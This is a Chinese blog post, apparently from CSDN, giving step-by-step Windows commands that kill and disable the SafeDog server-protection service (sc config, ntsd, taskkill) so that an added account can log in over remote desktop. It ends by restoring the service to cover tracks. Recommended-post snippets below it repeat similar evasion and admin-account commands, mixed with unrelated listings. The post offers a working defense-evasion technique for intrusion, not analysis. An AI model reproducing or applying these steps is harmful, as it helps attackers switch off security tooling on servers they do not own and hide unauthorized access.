安全狗下下加用户的又一方法

最新推荐文章于 2023-08-22 22:06:42 发布
最新推荐文章于 2023-08-22 22:06:42 发布
阅读量885 收藏
点赞数
分类专栏: 漏洞收集 文章标签: 安全狗加用户

上次发了安全狗下加用户的另一方法,据说不够风骚…所以这次要淫荡一点
方法同样很简单,不过不知道有没有人发过。。
PS: 转载请不要注明作者

0×01 测试环境:

安全狗的进程:
1

.安全狗的服务
2

.开启远程桌面守护
3

.远程登录测试:
4

.安全狗拦截
5

0×02 直入主题:

命令行下操作

  1. tasklist |find “Safe”

6
最后一个进程SafeDogGuardCenter.exe是关键,记下它的PID:1032

然后接连两个指令

  1. sc config SafedogGuardCenter start= disabled

7

  1. ntsd -c q -pid 1032

8
1032是刚才记下的SafeDogGuardCenter.exe 的pid,这个进程是服务器守护的核心,没了它,安全狗的服务器守护将没有任何作用
效果:
9

10

然后?然后就没有然后了~现在我们已经可以为所欲为了

真想看然后?那我们就来调戏一下狗狗咯
11

折腾一下狗狗的进程

  1. taskkill /f /t /im SafeDogUpdateCenter.exe /im SafeDogSiteIIS.exe /im SafeDogServerUI.exe

12

0×03 总结

旨在不依靠任何外部程序,终结安全狗的守护功能。
其中使用到的NTSD命令是系统自带的【2008/win7 以上被微软删减了,需要自己上传[XP的NTSD.EXE在system32目录下]】
安全狗在网站的安全上做的还可以,对自身的安全却完全没有考虑,无力吐槽。。
核心命令就两句话,顺序不能出错

  1. sc config SafedogGuardCenter start= disabled
  1. ntsd -c q -pid 1032

如果不先把安全狗的服务停掉,它就会不断的重新启动[两秒重启一次我会说?]

手尾:退出远程登录之后,最好把狗狗的服务改回来

  1. sc config SafedogGuardCenter start= auto

然后狗狗的服务会自己恢复原状的

7禧
关注
专栏目录
【高考志愿】计算机专业志愿填报指南
weixin_44062380的博客
06-17 2262
介绍计算机大类的专业分支,希望各位在进行专业填报的时候不再迷茫
2022年Java 工程师面试题
weixin_42572320的博客
03-03 2568
第 1 页 共 485 页 目录 1、什么是 Mybatis?............................................................................... 33 2、Mybaits 的优点:............................................................................... 33 3、MyBatis 框架的缺点:.............................
突破安全狗账户.zip
01-01
突破安全狗账户
安全狗用户的又一方法
wing 的专栏
01-30 2534
命令行下操作 tasklist |find “Safe” 最后一个进程SafeDogGuardCenter.exe是关键,记下它的PID:1032 然后接连两个指令 sc config SafedogGuardCenter start= disabled ntsd -c q -pid 1032 10
安全狗运程服务器登陆用户
现实与爱的博客
02-09 461
电脑添远程连接
003--Windows系统提权之数据库提权
weixin_44508748的博客
07-04 1209
在利用系统溢出漏洞无果的情况下,可以尝试采用数据库进行提权。数据库提权的前提条件:拥有数据库最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能。 sqlserver、MySQL都需要具备数据库管理员权限才可执行提权操作。linux系统下mysql root用户是服务用户,权限不足以提权。Windows下mysql root权限很高。zkeys、宝塔等集成环境有降权mysql root sql server数据库提权 流程:获取账号>数据库登录>安装组件>开启33
最简asp上传文件实例 .rar_asp 上传文件_asp上传类_militarym3l_possibleps2_简单的asp
07-15
在ASP中处理文件上传是一项常见的任务,特别是在需要用户提交文件到服务器的场景下,例如图片上传、文档分享等。这个“最简asp上传文件实例”是针对ASP开发者的一个简单示例,演示了如何在不依赖任何外部组件的情况...
Ubuntu 18.04 语言学相关软件的安装
Lukehub的博客
09-18 1190
3.3.2 语言学专业软件 3.3.2.1 praat 语音学的同学最离不开的软件praat,除了常见的win版,mac版, Paul Boersma and David Weenink 这两位大神实际上也做了linux版,官网左上角的Download Praat,点击那个linux,新页面中就是praat的安装方法啦~ Ubuntu系统下,打开你的终端,输入: sudo apt install...
seo相关文章
热门推荐
luofengdong的专栏
03-01 3万+
<br />SEO 网址:http://blog.myspace.cn/xmmei/category/41652.aspx<br /><br /><br /> 五个等级SEOer的特征分析<br />  顶尖的SEOer:<br /><br /> 他们几乎不写博客、不回帖、不参与互联网的争论,每天专心耕耘自己的网站,赚钱很低调,生活很滋润。新浪的SEO不知道哪位负责的,我一直想认识一 下,感觉他是顶尖的。另外听说有某SEOer搞英文站做外贸,公司每月营业额好几百万但只有30几个员工,前台小姐的工资都在
服务器安全狗V4.2收藏版
08-05
服务器安全狗V4.2收藏版,现在的版本有很多限制,V4.2无需注册,没有限制,好用!
安全狗进程的探讨
Df's blog
07-20 1371
安全狗安装之后通过云监控发现服务器只开启了一部分进程 1. 只开启了SafeDogGuardCenter.exe这个进程 2. 那些安全狗软件设置里的自启动只是你首次登录远程之后才会运行 3. 我的服务器是设置的每天自动备份重启一次 4. SafeDogGuardCenter.exe这个进程就是安全狗默认自启动的服务进程,即使你不远程登录,也会自动随系统启动
干掉safedog命令
weixin_34228662的博客
11-23 494
sc delete safedogguardcenter shutdown -r -t 00两条命令搞定 转载于:https://www.cnblogs.com/hookjoy/p/10005919.html
细说——WAF
LainWith的博客
10-11 1万+
目录WAF是什么主流WAF有哪些?WAF的分类软件型WAF硬件型WAF基于云WAF开源型WAF网站内置的WAFIPS与IDS,防火墙与WAF之间的比较和差异防火墙功能IPS入侵防御系统IDS入侵检测系统WAF对比IPS与IDS防火墙与IPS / IDSWAF与IPS / IDSWAF检测手工检测工具检测WAFwafw00fsqlmapnmapWAF进程与拦截页面D盾云锁阿里云盾腾讯云安全腾讯宙斯盾360主机卫士奇安信网站卫士网站/服务器安全狗护卫神·入侵防护系统网防G01政府网站综合防护系统(“云锁”升级版
Shell下突破安全狗远程桌面守护
weixin_34268753的博客
11-05 438
首先在Shell下把安全狗的安装配置给下来 默认安装路径: C:\Program Files\SafedogServer\SafeDogGuardCenter 找到 ProGuardData.ini 下载文件到本地虚拟机 虚拟机安装安全狗 然后文件覆盖一下 打开安全狗就可以看到的鸟....计算机名字和端口的配置信息 接下来...改虚拟机的计算机名字 然后 就可以正常连接了.....
内网信息收集总结
最新发布
qq_53058639的博客
08-22 369
指定扫描端口,不指定port,则默认端口为21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。通过获取的目标主机及所在域的各类信息,就可以绘制内网的拓扑结构图,在后续的渗透测 试中,对照拓扑图可以更快地了解目标域网内部环境,准确定位内网具体目标。
Windows系统提权
weixin_52263461的博客
03-17 477
Windows系统提权基础命令 查看IP ipconfig /all 获取端口信息 netstat -an netstat -ano netstat -anb 3. 获取服务信息 net start 4. 获取进程信息 tasklist /svc 5. 进程结束命令 taskkill /im 360tray.exe /f taskkill /pid 452(进程号) /F 6. 用户管理员命令,添用户huahua为管理员 net user huahua huahua
超强进程结束命令NTSD
weixin_33859231的博客
11-28 383
前两天儿子生病,带到学校来,用我的机子,结果染了一种很牛的病毒。 进程中会出现两个MESS和LSCSSS。 用了几种方法也结束不了。 后来,试了一下NTSD命令,甚爽。 1、利用进程的PID结束进程 命令格式:ntsd -c q -p pid 命令范例: ntsd -c q -p 1332 (结束explorer.exe进程) 2、利用进程名结束进...
如何突破安全狗远程桌面防护
KEY0NE的个人博客
06-03 431
这次来记录一下近日提权遇到的安全狗远程桌面防护如何突破 当渗透时遇到安全狗是一件很蛋疼的事情~当服务器开启了安全狗的远程桌面防护时,那么只有基于白名单验证的主机才能远程连接服务器验证方式有两种:1、基于IP\域名 2、基于计算机名通常默认都是基于计算机名的,因为一般情况下我们的IP都是动态分配,就算是用域名白名单那也要动态域名解析,比较复杂了。目前安全狗的Safe...
ent框架里在Schema文件下下一个hook的方法定义,举例说明
06-10
在 `ent` 框架中,可以在 `schema` 目录下的实体定义文件中定义钩子方法。下面是一个示例: ```go package schema import ( "context" "fmt" "crypto/md5" "entgo.io/ent" "entgo.io/ent/schema/field" "entgo.io/ent/schema/mixin" ) // UserMixin 定义一个 User 实体的混合类型 type UserMixin struct { mixin.Schema } // Fields 定义 UserMixin 的字段 func (UserMixin) Fields() []ent.Field { return []ent.Field{ field.String("name").Unique(), field.String("password"), } } // Hooks 定义 UserMixin 的钩子 func (um UserMixin) Hooks() []ent.Hook { return []ent.Hook{ // 在创建或更新 User 时,对密码进行 MD5 密 um.EncryptPassword(), } } // EncryptPassword 是一个钩子函数,用于对 User 实体的密码字段进行 MD5 密 func (UserMixin) EncryptPassword() ent.Hook { return func(next ent.Mutator) ent.Mutator { return ent.MutateFunc(func(ctx context.Context, m ent.Mutation) (ent.Value, error) { if password, ok := m.Field("password"); ok { // 如果密码字段不为空,则进行 MD5 密 if p, ok := password.(string); ok && p != "" { mp := fmt.Sprintf("%x", md5.Sum([]byte(p))) m.SetField("password", mp) } } return next.Mutate(ctx, m) }) } } ``` 上面的示例中,定义了一个 `UserMixin` 混合类型,它包含了一个名为 `EncryptPassword` 的钩子函数。这个钩子函数用于对 `User` 实体的 `password` 字段进行 MD5 密。 在 `Hooks()` 方法中,使用 `um.EncryptPassword()` 方法来注册这个钩子函数,表示在创建或更新 `User` 实体时,会自动调用这个钩子函数。 这个钩子函数的具体逻辑是,当执行 `Mutation` 的 `Field()` 方法时,如果字段名为 `password`,且字段值不为空,则对字段值进行 MD5 密,并使用 `Mutation` 的 `SetField()` 方法来设置密后的值。最后,调用 `next.Mutate()` 方法来继续执行下一个钩子函数或实体操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值